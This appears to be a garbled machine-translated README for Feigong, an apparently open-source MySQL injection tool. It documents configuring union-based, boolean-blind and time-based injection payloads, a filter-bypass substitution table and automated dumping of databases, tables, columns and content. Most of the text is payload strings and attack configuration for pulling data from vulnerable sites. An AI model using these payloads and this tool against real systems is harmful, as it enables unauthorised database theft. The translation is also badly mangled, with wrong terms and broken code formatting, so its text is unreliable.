Post can take a GET request directly into the destination URL

Feigong-Non-offensive and non-offensive

Taken from "The moon in the Qin Dynasty"--non-offensive, free-changing weapons for different situations

Feigong, a free-to-change MySQL injection script for every situation

Feigong,in view of the different things freely change the MySQL injection script

What is a non-offensive?

In the use of sqlmap, often encountered very common bypass filtering, such as Space-->%0b,%0a, but no way to use Sqlmap to obtain data, it took a long time to improve the script, Let non-attack can be modified config.py a file in the settings, so that non-attack in the face of different situations become a flexible injection script ...

Non-offensive is now integrated with MySQL's normal, build, time,3 type of injection method ...

Before using the non-offensive

1. First you need to find an injection point (consider writing a tool like this)

2. Judge the database as MySQL

3. Data can be obtained by cleverly filtering

4. Start using non-offensive

TODO basic function Optimization log storage optimization build injection, Time Injection algorithm optimization unpack function, avoid custom unpacking add thread pool optimization injection speed improve support for extended functions add more injection statements add more bypass filtering to add multiple database update logs 2016-8 -5 feigong 0.9.9 Complete Add payload processing module complete 2016-8-9 feigong 1.0.0 Complete Add log to file output optimization partial error handling add more complete documentation 2016-8-24 Feigong 1.0.1 Complete Excellent The blind algorithm optimizes the overall structure 2016-8-25 Feigong 1.1.0 completes the time Blind algorithm, optimizes the whole structure from 100->7 2016-8-26 Feigong 1.1.1, avoids the custom unpacking function 2016-8-27 Fei Gong 1.2.0 Complete refactoring config->config, advanced_config optimize the overall structure, significantly reduce redundant code usage documentation Feigong│.gitignore│feigong.py│readme.md│├ ─demo│├─demo1││advanced_config.py││config.py│││└─demo2│advanced_config.py│config.py│├─lib│conpayload.p Y│data.py│dealpayload.py│log.py│unpack.py│__init__.py│├─log│└─sqlier│advanced_config.py│config.py│__in it__.py│├─configuration│buildconfig.py│__init__.py│├─default│advanced_config_default.py│config_default.py│__ Init__.py│├─tamper│expand.py│__init__.py│└─techniques columns.py content.py database.py tables.py test.py __init__ . PY

Feigong The core of everything is sqlier/config.py and sqlier/advanced_config.py, code-level customizations can be faced in any situation

Installation

You can get the source by clicking Download, or Git clone.

git clone https://github.com/LoRexxar/Feigong.git using

First you need to install dependencies

Pip Install-r requirements.txt

Open the corresponding Feigong directory, run the default demo to see the results

Python feigong.py start

Feigong is injected by modifying sqlier/config.py & sqlier/advanced_config.py, config.py is the basic configuration of Feigong, Advanced_ The config.py is an advanced configuration, and the default configuration file, in default, does not cause the correct configuration to be found after the defaults are modified.

config.py is a basic configuration that can be configured only if the underlying configuration is complete.

Class Baseconfig:def __init__ (self): "" "base class initialization, core configuration of the entire injection tool" "" # destination URL Self.url = ' http://demo.lorexxar.pw/get.php ' # request header Parameter # cookies = {"username":d ata, "path": "/admin/", "Domain": "451bf8ea3268360ee.jie.sangebaimao.com"} # self.headers = {" Cookie ":" username= "+ Data +"; CAPTCHA=OD8LGG6F7I71Q16J9RD7P7J9A2; Username= "+ data} self.headers = {} # method 0 is get 1 for POST sqlirequest = (" Get "," post ") Self.sqlirequest = sqlirequest[0] # injection Mode 0 for normal 1 for blind 2 for time blind Sqlimethod = ("normal", "build", "timing") Self.sqlimethod = sqlimethod[1] "" "Starting here, to enter for payload Configuration, you first need to configure the injected statement, then inject the statement through the custom substitution table, and then construct the injection statement to replace the request payload===> with the specified payload===> custom substitution table ===> request ===> Start injection For normal injection, you must construct a payload that returns Bsqlier, and modify the unpacking function through test mode until you can get the return value (you must use a space delimiter, and you must end with only one word (the end can be modified by modifying the values in the custom substitution table) eg: Self.payload = "Padding ' union ALL select 1, ' Feigong ' #" If the build is injected, then the condition is constructed with, or conditional, if it is with injection, the padding must be the conditions of the return value eg:self.payload = "P Adding ' && 2333 # "If time is injected, you can use either of the above, the format matches, and the key position uses 2333 or ' feigong ' padding eg:self.payload =" padding " UNION ALL Select 1, ' Feigong ' # "eg:self.payload =" padding ' && 2333 # "" "Self.payload =" padding ' && 2 333 # "" "Configure the request to set the location of the payload in the request to Feigong (if misspelled it will all be invalid ...) ) Self.requesetformat = "User=feigong&passwd=ddog123&submit=log+in" Self.requesetformat = {"User": "Feigong", "Password": "A"} "" "Self.requesetformat =" User=feigong&passwd=ddog123&submit=log+in "# Self.requesetformat = {"User": "Feigong", "Password": "A"} "" "Before you inject, you first need to test that the test.py contains all the test functions, including tests, Get_now_database, get_version, Get_user self.wtest whether to enter the test mode, The test mode priority is the highest and the normal mode is not compatible, the default is turned on and TestMethod is the choice to use that kind of test, mutual compatibility can run "" "self.wtest = False Self.testmethod = {" Test ": 0," database ": 1 , "version": 1, "User": 1} "" "The choice of the formal injection mode, when test mode is turned on, regardless of whether the formal injection mode is turned on is not valid, the default turn on all for all injection, will be automatically injected from the database until the data before 10 content to inject data, You can preset columns, tables, and database columns to inject column names, you can preset tables and database tables to inject the table name, you can preset the database to inject table name uniform rules for if not preset, The class that automatically calls the previous layer gets the data "" "Self.wsqli = True self.sqlilocation = {" Content ": 1," Columns ": 1," Tables ":1, "Database": 1}

Advanced_config.py is an advanced configuration, the Advanced configuration can be configured with some special conditions

Class Advanceconfig (baseconfig): def __init__ (self): "" "Advanced configuration, if you are not familiar with the code, we recommend that you do not modify this section of the configuration" "" Baseconfig.__init__ (self) # version number Self.version = "V1.2.0" # Initialize request SELF.S = requests. Session () # Log log level, debug to display most of the information, info for injection results display LogLevel = (logging. DEBUG, Logging.info, logging. WARN) Self.loglevel = loglevel[0] "" "If the injection method is build blind, the length of the true condition is judged by the return length (required for blinds), default is 0, can be set, If you do not set the return length that will be obtained by default using Self.payload = Self.len "" "Self.len = 0" "If the injection mode is time, you need to set the delay, it is recommended to choose according to their network environment, if the network environment is poor, the proposal is still a little bit of recommendation 2-5, Now the version is a single thread, so the time blind will be slower ... "" "Self.time = 3" "" Database can be customized, default is empty, if NULL will call Get_database (), here is a list, must follow the list format self.databases_name = [' Test ', ' test2 '] (Of course, if the database_name error ... "" "" "# self.databases_name = [' hctfsqli1 ', ' test '] self.databases_name = []" "" then the table Name,tables_name is in the form of a dictionary + tuple Self.tables_name = {' Hctfsqli1 ': (' test1 ', ' test2 '), ' Test ', (' test1 ', ' Test2 ')} (if there are some values written incorrectly, the data will not be noted) "" "# Self.tables_ Name = {' Test ': (' Test ',), ' Hctfsqli1 ': (' HHHHCTF ', ' Test ', ' users ')} Self.tables_name = {} "" "and then Self.columns_name,Columns_name format for dictionary set dictionary + tuple self.columns_name = {' Test ': {' Test ', ' test1 ', ' Test2 ')}, ' Test2 ': {' Test ': (' Test ', ' t Est1 ', ' Test2 ')}} (again, if there is a wrong value, it will not be injected into the data) "" "# Self.columns_name = {' Test ': {' Test ': (' Test ',)}, ' Hctfsqli1 ': {' Test ': (' Te St1 ', ' testtest ', ' Flag1 '), ' users ': (' id ', ' username '), ' HHHHCTF ': (' flag ', ')}} self.columns_name = {} "" "When you choose to inject content, you You need to specify the upper limit of the input data, the default is "" "Self.content_count = 10" "" To configure a custom replacement table, a reasonable replacement table configuration can replace all the desired situation payload "" "Self.filter = {# padding to fill field, build and injection requirements padding must be true ' padding ': ' user1 ', # symbol substitution (URL encode is get default comes with, do not need to modify) ' \ ': ' \ ', ' \ ': ' \ ' ', ' & ' ' | ': ' | ', ' > ': ' > ', ' < ': ' < ', ' = ': ' = ', '. ': '. ', '. ', ' '. '. ' ' Insert ', ' Update ': ' Update ', ' delete ': ' delete ', ' limit ': ' Limit ', ' where ': ' Where ', # inject function ' user ': ' User ', ' database ': ' Database ', ' Version ': ' Version ', ' If ': ' If ', ' ifnull ': ' ifnull ', ' concat ': ' concat ', ' ASCII ': ' ASCII ', # Hex (), Bin () ' Cou NT ': ' Count ', ' substring ': ' Substring ', # Mid (), substr () ' length ': ' Length ', "Sleep (" + repr (self.time) + ")": "Sleep (" + repr (self.time) + ")", # B Enchmark () # Library Name Table name keyword ' information_schema ': ' Information_schema ', ' schemata ': ' schemata ', ' schema_name ': ' schema_name ', ' Tables ': ' Tables ', ' table_name ': ' table_name ', ' columns ': ' Columns ', ' column_name ': ' column_name ', # then a special character ': ', # Because the URL is automatically encode after filtering, the replacement table cannot use URL encode characters, eg:%0a->\n%0b->\x0b ' # ': ' # ' #--+} ' "" Initialize Dealpayload class, incoming Self.sqlim Ethod,self.payload, Self.requestformat, Self.filter "" "Self.dealpayload = Conpayload (Self.sqlirequest, Self.payload, Self.requesetformat, Self.filter, Self.time)

The current version of Feigong also supports only 3 ways to inject MySQL:

Normal injection (normal): that is, there will be a return injection point blind (build): There is no return, but can be true and false conditions to determine the execution of the results of the time blind: no return, but you can return the request by the interval time to determine the true and false base configuration

First you need to base the configuration, the first is the base of the target URL, the request header, the method of transmission, injection, etc...

# destination URL Self.url = ' http://demo.lorexxar.pw/get.php ' SELF.S = requests. Session () # Request header Parameter # cookies = {"username":d ata, "path": "/admin/", "Domain": "451bf8ea2881064151ee.jie.sangebaimao.com"} # self.headers = {"Cookie": "username=" + Data + "; CAPTCHA=OD8LGG6F7I71Q16J9RD7P7J9A2; Username= "+ data} self.headers = {} # method 0 is get 1 for POST sqlirequest = (" Get "," post ") Self.sqlirequest = sqlirequest[0] # injection Mode 0 for normal 1 for blind 2 for time blind Sqlimethod = ("normal", "build", "timing") Self.sqlimethod = sqlimethod[0]

Each of the above steps give the corresponding parameters, the target URL, do not need to add parameters, about the configuration of parameters, we will be in the following ...

PS: If the GET and post requests must exist, if the injection point and post, you can directly put the GET request into the target URL, if the reverse, it is temporarily not supported

Configuration of injection mode

Depending on the selection in this section, we will make different configuration options later

Sqlimethod = ("normal", "build", "time") Self.sqlimethod = sqlimethod[0] Normal

If the injection mode is normal, you need to define the base payload

Self.payload = "Padding ' union ALL select 1, ' Feigong ' #"

The basic payload required for normal injection must return Feigong

Build

If the injection mode is build, you need to configure the base payload and set the true value to return the page length

If the build is injected, then the condition is constructed with, or conditional, if it is with injection, the padding must be the return value of Eg:self.payload = "padding ' && 2333 #"

The return length for true value can be customized or undefined, because the test function in test.py automatically sets Self.len (using the underlying payload)

Self.len = 0 Time

If the injection mode is time, in addition to setting the base payload, you also need to set the sleep period, which is in the Advanced configuration, the default is 2

Self.time = 2

If the network environment is too poor, it is recommended (2-5)

If time is injected, either of the above can be used, and the format matches it, and the key position is filled with 2333 or ' Feigong '.

Eg:self.payload = "Padding ' union ALL select 1, ' Feigong ' #" eg:self.payload = "padding ' && 2333 #" Configuration Request format

Configure the request to set the location of the payload in the request to Feigong (if the spelling is wrong, it will all be invalid ...) ）

Self.requesetformat = "User=feigong&passwd=ddog123&submit=log+in" Self.requesetformat = {"User": "Feigong", " Password ":" A "}

The above two are request formats for Get and post requests, respectively

Select injection mode

Before you inject, you first need to test that test.py contains all the test functions, including tests, Get_now_database, get_version, Get_user

Self.wtest whether the test mode is entered, the test mode has the highest priority and the normal mode is not compatible, the default is turned on

And TestMethod is the choice to use that kind of test, mutual compatibility can run at the same time

Self.wtest = True Self.testmethod = {"Test": 0, "Database": 1, "version": 1, "User": 1}

After the test is successful, the formal injection model will be started ...

The choice of the formal injection mode, when test mode is turned on, no matter whether the formal injection mode is turned on or not, the default is turned on

Content for injection data, you can preset columns, tables and database, the default injection of 10 data columns to inject column name, you can preset tables and database tables to inject the table name, you can preset the database Database to inject table name uniform rules for if not preset, automatically call the previous layer of the class to get the data

Self.wsqli = True self.sqlilocation = {"Content": 1, "Columns": 1, "Tables": 1, "Database": 1} Advanced Configuration

In the advanced configuration, we can reduce the injection range by default

Database can be customized, default is empty, if NULL will call Get_database (), here is a list, must follow the table format (of course, if database_name error ... No data is being injected)

Self.databases_name = [' hctfsqli1 ', ' test '] self.databases_name = []

Then the table name,tables_name is in the form of a dictionary + tuple (the data is not available if some values are written incorrectly)

Self.tables_name = {' Test ': (' Test ',), ' Hctfsqli1 ': (' HHHHCTF ', ' Test ', ' users ')} Self.tables_name = {}

Then the self.columns_name,columns_name format is the dictionary set Dictionary + tuple (again, if there is a wrong value, it will not be injected into the data)

Self.columns_name = {' Test ': {' Test ': (' Test ', ')}, ' Hctfsqli1 ': {' Test ': (' test1 ', ' testtest ', ' Flag1 '), ' users ': (' id ', ' u Sername '), ' HHHHCTF ': (' flag ', ')}} self.columns_name = {}

When you choose to inject content, you need to specify the upper limit of the input data, which defaults to 10

Self.content_count = 10 Configuring a Custom replacement table

This Part one is in the Advanced configuration

Configure a custom replacement table, a reasonable alternative to the table configuration can be much more than the replacement of all the circumstances payload

A reasonable configuration replacement table, you can customize any payload, such as

#-->group by a# Sleep (2)-->benchmark (10000000,sha (1))

In short, if you are familiar with the code, you can generate any payload

Self.filter = {# padding is the Fill field, the build and injection requirements padding must be true ' padding ': ' user ', # symbol substitution (URL encode is get default comes with, no modification required) ' \ ': ' \ ', ' \ ' "': ' \ '" ', ' & ': ' & ', ' | ': ' | ', ' > ': ' > ', ' < ': ' < ', ' = ': ' = ', '. ': ' ", '. ' Elect ': ' SELECT ', ' Insert ': ' Insert ', ' Update ': ' Update ', ' delete ': ' delete ', ' limit ': ' Limit ', ' where ': ' Where ', # inject function ' User ': ' User ', ' database ': ' Database ', ' Version ': ' Version ', ' If ': ' If ', ' ifnull ': ' ifnull ', ' concat ': ' concat ', ' ASCII ': ' ASCII ', # Hex (), Bin () ' Count ': ' Count ', ' substring ': ' substring ', # Mid (), substr () ' length ': ' Length ', "Sleep (" + repr (SE Lf.time) + ")": "Sleep (" + repr (self.time) + ")", # Benchmark () # Library Name Table name keyword ' information_schema ': ' Information_schema ', ' Sch Emata ': ' schemata ', ' schema_name ': ' schema_name ', ' Tables ': ' Tables ', ' table_name ': ' table_name ', ' columns ': ' Columns ', ' column_name ': ' column_name ', # then a special character ': ', # because the URL encode is automatically filtered, the replacement table cannot use the URL encode characters, eg:%0a->\n%0b->\x0 B ' # ': ' # ' #--+} start injecting

Start injection

Python feigong.py

Post can take a GET request directly into the destination URL